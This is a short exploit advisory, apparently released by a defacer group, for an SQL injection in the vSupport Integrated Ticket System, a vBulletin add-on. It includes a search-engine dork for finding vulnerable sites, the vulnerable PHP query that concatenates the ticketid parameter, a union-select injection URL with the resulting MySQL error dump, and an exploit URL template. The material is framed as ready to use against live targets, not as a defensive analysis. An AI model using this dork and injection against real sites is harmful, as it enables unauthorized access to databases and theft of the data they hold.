+-------------------------------------------------------------------- + + Affected Software .: vSupport Integrated Ticket System + Venedor ...........: http://www.cmgsccc.com + Class .............: SQL injection + Dork ..............: inurl:vBSupport.php + Found by ..........: rUnViRuS + Original advisory .: http://www.sec-area.com/ + Contact ...........: stormhacker[at]hotmail[.]com + +-------------------------------------------------------------------- + PoC: + + Database error SQL +-------------------------------------------------------------------- // do not limit the users access $fromuseraccess = ""; } // get the info about the ticket first if ($ticket = $db->query_first(" SELECT ticket.* " . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . " FROM " . TABLE_PREFIX . "ticket as ticket " . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . " WHERE ticketid=" . $vbulletin->GPC['ticketid'] . " $fromuseraccess ")) { +-------------------------------------------------------------------- + An example: +-------------------------------------------------------------------- http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/ +-------------------------------------------------------------------- + output: +-------------------------------------------------------------------- MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5 Error Number : 1064 Date : Monday, July 2nd 2007 @ 02:54:54 PM Script : http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/ Referrer : IP Address : 127.0.0.1 Username : admin Classname : vb_database Invalid SQL: SELECT ticket.* ,icon.title AS icontitle, icon.iconpath FROM ticket as ticket LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid) WHERE ticketid=1/**/union/**/select/**/; +-------------------------------------------------------------------- + Exploit : +-------------------------------------------------------------------- http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL] +-------------------------------------------------------------------- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +-------------------------------------------------------------------- + [W]orld [D]efacers [T]eam + Greets: + || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE || + || Pro Hacker || - || DARKFIRE || + +-------------------------[ W D T ]----------------------------------